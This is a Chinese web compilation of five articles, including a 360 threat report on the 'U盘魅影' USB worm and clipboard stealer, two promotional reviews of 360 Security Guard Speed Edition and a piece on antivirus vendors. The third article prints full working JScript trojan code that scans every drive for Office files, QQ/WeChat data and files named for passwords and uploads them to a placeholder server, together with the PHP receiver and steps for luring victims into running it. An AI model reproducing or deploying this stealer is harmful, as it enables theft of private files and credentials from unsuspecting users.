360顽固木马专杀大全文章列表:

• 1、潜伏已久，集百毒之长：U盘魅影木马爆发
• 2、360安全卫士极速版深度体验，永久免费无弹窗，8大核心功能真给力
• 3、快来看看你的电脑中毒了吗？新型木马曝光
• 4、好用又安全的360安全卫士极速版
• 5、曾经做杀毒软件的江民、瑞星、360公司，现如今到底怎么样了？

潜伏已久，集百毒之长：U盘魅影木马爆发

360安全大脑近期拦截到一批恶性病毒，该病毒集蠕虫，勒索，剪切板幽灵等诸多病毒功能于一体，扩散速度极快，对用户机器的破坏程度极高。通过360威胁情报系统观测，该病毒在2017年就已潜伏在用户电脑上，并于近期爆发，因其通过可移动设备传播的方式和复杂的病毒功能，我们将其命名为"U盘魅影"。

"U盘魅影"最先是由下载器进行传播，感染用户机器后会禁用安全软件的实时防护，访问保护，主动防御等功能。并通过添加防火墙信任列表的方式绕过防火墙检测。携带的蠕虫模块会将病毒传播到可移动设备，网络驱动器，共享文件夹和一些常见的默认网站目录下，这种传播方式会使病毒在内网中迅速扩散。

该病毒还携带了我们在2018年6月份披露的"剪切板幽灵"木马，窃取比特币，以太坊在内的十余种虚拟货币。

除此之外，"U盘魅影"还会下载并执行其他的病毒模块，我们在其下载的诸多病毒模块中检测到最新版本（5.0.4）的GandCrab勒索病毒。

整体流程，如下图所示：

详细分析：

360安全大脑检测到"U盘魅影"病毒最初是由下载器进行传播，当用户运行下图所示的下载器之后就会释放出该病毒：

病毒在运行后会检测虚拟环境，如果有以下进程正在运行则不会执行后续的病毒逻辑：

注册为自启动：

禁用杀毒软件，关闭实时防护，访问保护，主动防护，系统还原等功能，并将病毒添加到防火墙放过列表中，以此来绕过防火墙检测：

之后创建四个线程，执行后续感染，盗取虚拟货币，下载执行其他病毒模块等功能：

蠕虫模块

感染可移动设备（例如：软盘驱动器，USB设备或闪存卡读卡器）和远程驱动器（共享文件夹）：

感染系统敏感目录：

剪切板幽灵

创建一个线程，每隔200毫秒获取一次剪切板内容：

过滤剪切板内容，当内容为虚拟货币地址时，则替换为病毒作者的地址，以此来盗取虚拟货币。

以1LdFFaJiM7R5f9WhUEskVCaVokVtHPHxL5为例

11月12号盗取了用户的一次转账

下载执行其他病毒模块

"U盘魅影"会通过C&C服务器下载其他的病毒模块并执行，代码逻辑，如下图所示:

该病毒下载的病毒模块繁多，病毒作者也在持续的更新病毒模块，下图是一个被病毒感染的Temp目录：

我们在其下载的诸多模块中检测到了GandCrab勒索病毒（5.0.4版本），勒索病毒运行后会加密用户数据，并将桌面壁纸篡改为如下图所示的勒索提示信息：

有关GandCrab勒索病毒，请参考我们之前的分析报告，此处不再赘述。

安全建议

下载器和破解软件是近几年病毒传播的主要途径，而部分下载站所提供的软件其安全性无法得到保障。360软件管家是360安全卫士提供的一款集下载、安装、升级、卸载、购买软件的管理工具，软件库中收录万款正版软件，均经过360安全大脑白名单检测，建议广大用户使用360软件管家安装软件。

像"U盘魅影"这种综合电脑病毒的出现在近几年呈上升态势，针对日益严峻的网络安全问题，搭载了"安全大脑"的360安全卫士，利用人工智能技术使安全软件做到了"自主学习""预警感知""全面防护"，可率先实现对此类病毒的查杀。用户在面对电脑问题，或是电脑遭到病毒袭击时可以下载360安全卫士为电脑解围。已经开始使用的用户可以通过保持安全卫士的时常开启来确保电脑的安全。

IoCs:

360安全卫士极速版深度体验，永久免费无弹窗，8大核心功能真给力

7月下旬，360安全卫士官方宣布正式上线“360安全卫士极速版”，主打“永久免费、无弹窗广告”的特点。此次，极速版除了保留了常规版的功能，还在发挥安全保护作用的基础上，更便捷地帮助大家提高电脑使用和管理的体验。今天，笔者将通过这几天的深度使用感受，深入聊聊对于这款软件的看法。

通过官方渠道找到360安全卫士极速版的下载地址，下载之后系统会出现是否同意并安装的提示，整个界面非常简洁且流畅，没有多余的隐藏应用选项，360安全卫士极速版采用风扇式动画风格，对比普通版的进度条更具活力和动感。

360安全卫士极速版安装界面截图

360安全卫士极速版安装提示界面

360安全卫士极速版采用风扇式动画风格

打开安装好的360安全卫士极速版，界面风格更简约清晰，在设计上去复杂化并且以蓝色为主色调，对比之前的版本确实给人焕然一新的感觉。360安全卫士极速版的首页分为电脑体验、木马查杀、清理加速、系统·驱动、网络安全、数据安全、安全大脑、软件管家共8个核心功能。其中有一个大亮点，就在于它的每个功能页面”相关使用工具“里都安排了更具有针对性的工具，用户可自主选择需要的功能，实现个性化定制。

360安全卫士极速版8大核心功能

360安全卫士极速版相关实用工具

众所周知，360以“杀毒软件”出名，木马查杀被摆在八大核心功能第二位也凸显其地位。首先，木马查杀模块。在当前快速发展的互联网时代，一些心怀不轨的人为了获取用户资料而通过非法的途径入侵他人的电脑，对用户和企业造成巨大的经济损失，所以如何在电脑端把这些“不速之客”挡在门外是360的首要责任。

360安全卫士极速版木马查杀界面

进入木马查杀模块之后可以看到，它包括全盘查杀、按位置查杀、系统急救箱、反勒索服务还有主页修复共五大功能。快速查杀又可以分为“强力查杀”和“节能查杀”，通过实测，在已经接入360安全大脑的常规模式查杀下，电脑打开浏览器的速度变快了。

360安全卫士极速版系统驱动界面

其次，系统·驱动模块。当选择一键修复之后，360安全卫士极速版会从常规修复、漏洞修复、软件修复还有驱动修复共四个方面进行修复，通过两轮扫描之后共查找到17项应该修复的内容，效率还是挺高的。

360安全卫士极速版自定义主页和浏览器

在点击主页修复的时候，360会提供包括IE浏览器、Microsoft Edge、百度浏览器、Mozilla Firefox中文版可以选择并由用户自己锁定，主页也能够自定义锁定，这都是值得点赞的。因为以往在使用普通版的时候总是会偷偷篡改用户的设置，让人感到非常讨厌，而这一次360安全卫士极速版更人性化了。

360安全卫士极速版网络安全界面

最值得注意的是，此次360安全卫士极速版新增网络安全模块，包括断网急救箱、网速测试、流量防火墙、WIFI体验、LSP修复、DNS设置等功能。可对用户网络环境进行安全监测管理，这些都与用户市场使用电脑是息息相关的。

360安全卫士极速版为“浏览器打广告”

比如我比较常用的宽带测速器，有时候我在下载电影或者电视剧的时候，网速总会感觉有些卡顿，这时候便会习惯性打开测速软件测试一下网络速度，每一次看到360安全卫士极速版弹出“火箭”两个字，我也就放心了。不过，在这里需要说一下，当我第一次打开宽带测速器使用完毕之后点击关闭窗口的时候，360安全卫士极速版还是会给自家360浏览器“打广告”。当然，你也可以选择暂不安装并不再提示，之后便不会出现这个框框了。

360安全卫士极速版软件管家已无弹窗

另外，之前在打开360安全卫士极速版软件管家的时候会出现几秒钟的广告弹窗并没有完全净化，但是当今晚（8月15日）更新最新版本“极速版”之后，点开软件管家已经完全干净了，没有看到任何广告弹窗的迹象，值得点赞。

当然，360 安全卫士极速版安装完成后，软件会默认弹出加速球悬浮窗，可双击加速或鼠标悬停查看详情，也可以永久关闭，这些对比普通版都有明显改进。

最后，360安全卫士极速版提供电脑体检、清理加速等功能，也大大方便电脑系统维护，开机启动项管理，系统盘瘦身等都是不错的加分项。最后，360安全大脑不知道因为什么原因经常加载不出来，这也是需要改进的地方。

下载360安全卫士“极速版”使用一段时间后发现，此前令人头疼的弹窗广告的确消失了，这一次360结合极简的产品发展趋势推出“极速版”，也算是对传统模式的一次大刀阔斧改革，8大核心功能也能够从用户的使用习惯出发，在惹怒用户和赚钱上找到一个平衡点，在媒体监督和相关部门的关注下找到一个临界点，360安全卫士极速版的诞生对于行业的意义也十分重大。

综上所述，笔者通过对于360安全卫士极速版的深度使用之后发现，360确实兑现了无弹窗广告的承诺，从下载安装到体验各功能阶段，电脑都没有出现弹窗广告，即使在一些细节方面还有待改进，但是我们看到了360能够也愿意根据网民实际需求作为出发点，结合极简的产品趋势，顺势推出360安全卫士极速版，让用户根据自身的需求去选择适合自己的产品，不忘初心，全面捍卫用户网络安全，砥砺前行的态度迈向前方，未来确实可期。

快来看看你的电脑中毒了吗？新型木马曝光

导读：在日常电脑使用中，很多小伙伴都会从互联网下载网站或是QQ、微信等聊天软件中进行传输安装软件、文件等。略知网络安全的朋友们都会比较谨慎所安装的软件是否安全，比如说通过杀毒软件杀毒、通过对文件的后缀、图标、大小等分析，那么这样的操作真的就是安全的吗？

相信大家都对远程木马有所了解，名气最大的应该是灰鸽子远程木马，它就是通过后缀为exe文件诱导用户点击，从而造成个人隐私、文件的泄漏甚至金钱损失。

灰鸽子木马界面

随着互联网安全工具越来越成熟，对之前的exe木马文件的云查杀越发严格，基本上做过免杀的程序也挺不了多久就被发现，所以像这类的远程木马已经慢慢消失成为历史。

但是道高一尺魔高一丈，最新的远程木马通过新的途径新的方式悄然出现，它就是利用js代码来猎取你的电脑文件，更为可怕的是它可以通过逻辑代码自动地进入电脑文件中搜索预设好的文件后缀进行分析获取，比如说代码只想获取你的聊天记录，那么它会通过检索查找到QQ、微信等数据库文件上传获取、也可以通过查找相册等目录获取照片等隐私文件，危害还是非常大的，本期文章小君就对js木马进行分析，看它是如何获取文件的。

首先js木马的特点：

优点：

文件小、js后缀善于隐藏，目前杀毒软件对它用处不大，可完全通过360安全。

危害大，可以自动搜索目标文件获取。

缺点：

QQ传输引导中马时会自动改后缀名称，所以很大程度上是需要通过将js代码进行压缩后引导安装。

使用方法：

首先需要木马使用者搭建一台服务器，当然也可以是虚拟空间、vps等都是可以的，然后搭建PHP环境，大家都知道像灰鸽子这类远程木马都有客户端和服务端两部分，那么js木马同样也有，需要在PHP环境下上传服务端代码server.php文件，在网站目录下新建一个目录upload用于获取中马者的隐私文件，接下来就是将js代码也就是木马的客户端发送给被控者引导点击，如果成功点击，远程服务器将会开始不断收到上传的隐私文件。

效果图

代码分享：

js木马客户端代码如下：

var __POSTURL__ = 'http://www.xxx.com/server.php';function UpFile(FilePath, FileName) { var Stream = new ActiveXObject('ADODB.Stream'); Stream.Type = 1; Stream.Open(); Stream.LoadFromFile(FilePath); var XHR = new ActiveXObject('Msxml2.XMLHTTP' || 'Microsoft.XMLHTTP'); XHR.open('POST', __POSTURL__, false); XHR.setRequestHeader('fileName', FileName); XHR.setRequestHeader('enctype', 'multipart/form-data'); XHR.send(Stream.Read()); Stream.Close(); return XHR.responseText}function GetDriveList() { var FSO = new ActiveXObject("Scripting.FileSystemObject"); var e = new Enumerator(fso.Drives); var re = []; for (; ! e.atEnd(); e.moveNext()) { if (e.item().IsReady) { re.push(e.item().DriveLetter) } } return re}function GetFolderList(folderspec) { var fso = new ActiveXObject("Scripting.FileSystemObject"); var f = fso.GetFolder(folderspec); var fc = new Enumerator(f.SubFolders); var re = []; for (; ! fc.atEnd(); fc.moveNext()) { re.push(fc.item()) } return re}function GetFileList(folderspec) { var fso = new ActiveXObject("Scripting.FileSystemObject"); var f = fso.GetFolder(folderspec); var fc = new Enumerator(f.files); var re = []; for (; ! fc.atEnd(); fc.moveNext()) { re.push([fc.item(), fc.item().Name]) } return re}function Search(Drive) { var FolderList = GetFolderList(Drive); for (var i = 0; i < FolderList.length; i ) { Search(FolderList[i]) } var FileList = GetFileList(Drive); for (var i = 0; i < FileList.length; i ) { if (/.(doc|docx|xls|xlsx)$/i.test(FileList[i])) { UpFile(FileList[i][0], FileList[i][1]) } }}function Load() { var WMIs = GetObject("winmgmts:.rootcimv2"); var Items = WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name = 'wscript.exe'"); var i = 0, rs = new Enumerator(Items); for (; ! rs.atEnd(); rs.moveNext()) { i } if (i > 1) WScript.Quit(0); Items = WMIs = i = rs = null; var DriveList = GetDriveList(); for (var i = 0; i < DriveList.length; i ) { Search(DriveList[i] ":") }}Load();

PHP服务端代码：

<?phpif($_SERVER['REQUEST_METHOD'] == 'POST'){ $fileName = uniqid(rand()) . '_' . iconv('utf-8', 'gbk', $_SERVER['HTTP_FILENAME']); print_r(file_put_contents("uploads/{$fileName}", $HTTP_RAW_POST_DATA));}?>

还可以通过对js代码的升级来实现更多新的功能

1、获取微信、QQ等隐私信息

function GetQQWeChat() { var QQList = []; var WechatList = []; var QQPath = "C:Users" USERNAME "DocumentsTencent Files" var WechatPath = "C:Users" USERNAME "DocumentsWeChat Files" var Patt = new RegExp(/[^] $/); if (FSO.folderExists(QQPath)) { var QQFolderList = GetFolderList(QQPath); if (QQFolderList) { for (var i = 0; i < QQFolderList.length; i ) { var QQFolderStr = QQFolderList[i]; var QQResult = Patt.exec(QQFolderStr); var QQ = ""; if (QQResult) QQ = QQResult[0]; if (QQ == "All Users") continue; QQList.push(QQ); } } } if (FSO.folderExists(WechatPath)) { var WechatFolderList = GetFolderList(WechatPath); if (WechatFolderList) { for (var i = 0; i < WechatFolderList.length; i ) { var WechatFolderStr = WechatFolderList[i]; var WechatResult = Patt.exec(WechatFolderStr); var Wechat = ""; if (WechatResult) Wechat = WechatResult[0]; if (Wechat == "All Users") continue; WechatList.push(Wechat); } } } return {"QQList":QQList, "WechatList":WechatList}}

2、通过政策表达式获取文件名含"账号"、"密码"、"account"、"password"等文件

if (/((账号|密码|password|passwd|account) (.*)*.(txt|doc|docx|xls|xlsx)$)|(.(JPG|PNG)$)/.test(FileList[i][1])) { UpFile(FileList[i][0], FileList[i][1])}

3、获取目标电脑用户名

function GetUserName() { var WshNetwork = new ActiveXObject("WScript.Network"); var UserName = WshNetwork.UserName; return UserName; }XHR.setRequestHeader('userName', USERNAME);

以上代码仅供研究，请勿非法利用！

结语：

看到这里是不是感觉自己的电脑并非那么的安全，我们在日常使用中，首先要有一定的安全意识，任何文件的传输，不要不做分析就随意双击打开，养成使用杀毒软件查杀的习惯，虽然并不能保证完全被查杀，但最起码也能过滤百分之九十以上的木马文件，剩下的就要靠自己的分析和判断，莫名其妙来源文件不接，图标异常的不接、文件大小与所需要内容不对等的文件不接。感谢您阅读本期网络安全普及文章，如果本文对您有所帮助请关注点赞哟，如果在网络安全中遇到问题请在评论区或私信留言。

好用又安全的360安全卫士极速版

各位360的伙伴们，大家好，提起360卫士我想大家都不陌生，360是首款免费面向大众的杀毒软件，一直怀抱初心。从我第一电脑就开始用了，装机必备第一个安装的就是360安全卫士，360浏览器，360杀毒以及手机上也用了360手机卫士，极安全，零骚扰，让您安全享受上网冲浪，言归正传，今天我们一起体验的是360推出的极其精简版本的360安全卫士极速版，首先是安装界面，还是绿调调，界面简洁

安装界面

其次就安装过程依然保留了以往的一个安装动画

安装界面动画

接下来就是主界面的子菜单电脑体检，而且智能扫描的过程中已经接入了360安全大脑以全面提升检测能力，对电脑检测的结果进行一键修复，安全，省心。

菜单功能方面，有木马查杀、网络安全、电脑清理、系统修复、优化加速、功能大全等核心入口，每个功能的页面也是清爽的极简风格，虽然极速版“极速”而不“削弱”。

有360十余年积淀的 “安全大脑”加持，多个维度守护网络、保障数据安全，极速版也保留了正式版的软件管家。绝大多数软件都可以从这里安全下载或更新版本，平时下载软 件不必再去百度添堵，从源头上保证不会中毒中木马。当电脑下载或接收到不明来历的文件时，可以通过“安全大脑”将其上传到云端扫描分析，判定恶 意样本，从而最大限度地守护系统安全。使用极速版，目前体验不错，安安静静勿打扰，简化而直观的操作界面，更适合商务办公场合肃清工作桌面干扰，也比较便于上了年纪的电脑用户 清爽上网，所以我默默的把家里两台电脑和公司的电脑都换上了360安全卫士极速版，反正我觉得极速版更懂我们的心，资讯弹窗提醒都没了，干干净净，而且继续永久免费，360真的很给力，再次强烈推荐360安全卫士极速版。

曾经做杀毒软件的江民、瑞星、360公司，现如今到底怎么样了？

#杀毒软件行业如何可持续发展?# 对于杀毒软件聊点题外话，你知道江民杀毒和瑞星杀毒吗？说这个话好像有点暴露年龄了，这两个杀毒软件是在360和腾讯管家问世之前非常火的杀毒软件，守卫着电脑安全和网络安全！

但是你相信吗？你可能很熟悉这两家公司，可能认为他们早就已经关门了吧！但是其实不然人家活得好好的，其实这两年360的热度也下调了很多，自从移动互联网时代来临，手机好像对于杀毒软件那么强的需求了，所以杀毒软件他们后来做了什么！

我去他们的网站，看到了他们有一个共同的业务点，那就是企业需求，他们开始着重在做企业服务！例如下图中的瑞星企业，着重开始做终端安全、云安全和网关安全服务！服务的客户当中还有国家重要的机关单位！可见杀毒企业去做网络安全和云端安全以及重要的企业电脑安全是多么重要的业务体系！

互联网安全，不仅仅是杀毒，查杀木马，还有发现漏洞，做预防做守卫，这就相当于互联网上的保安公司一样，守护着数据安全甚至还是国家信息安全！例如江民杀毒体系，他们也在做终端安全体系，例如：终端安全：网络版杀毒信创版杀毒(国产化LINUX杀毒)、赤豹终端安全检测与响应系统、EDR赤豹近卫终端安全防御系统、EPP赤豹防勒索系统赤豹端点全息系统、LINUX杀毒工控主机安全防护系统；边界安全：防毒墙网络准入控制系统、病毒威胁预警系统、流量汇聚及分流系统、文件摆渡恶意代码检测系统；大数据安全：病毒威胁溯源分析平台、全流量威胁检测回溯系统；安全服务：钓鱼网站监测与关停重大活动安全保障服务、应急响应服务生态合作；

至于后来者的360，这些年也在着手做安全体系，甚至针对企业重要的岗位还在推荐使用企业版360安全卫士，360也开始在做企业服务，甚至这些年做白帽，还帮助微软等大型互联网公司发现过漏洞！当然360在个人端业务也非常多，例如搜索、安全卫士、浏览器、压缩软件等等体系！当然这两年360最响亮的业务就是政企业务了，接着就是智能硬件方面的业务体系了！

可见会技术还是很了不起的，只要一家企业也在不断的学习成长，不断的居安思危，总能发现自己的机会，相信在未来无论是个人还是企业以及政府会越来越重视安全，这个安全方面不仅仅是从软件层面，还要从硬件层面全面下功夫，相信会有很多机会的，对此大家是怎么看的，欢迎关注我创业者李孟和我一起交流！

免责声明：本文由用户上传，如有侵权请联系删除！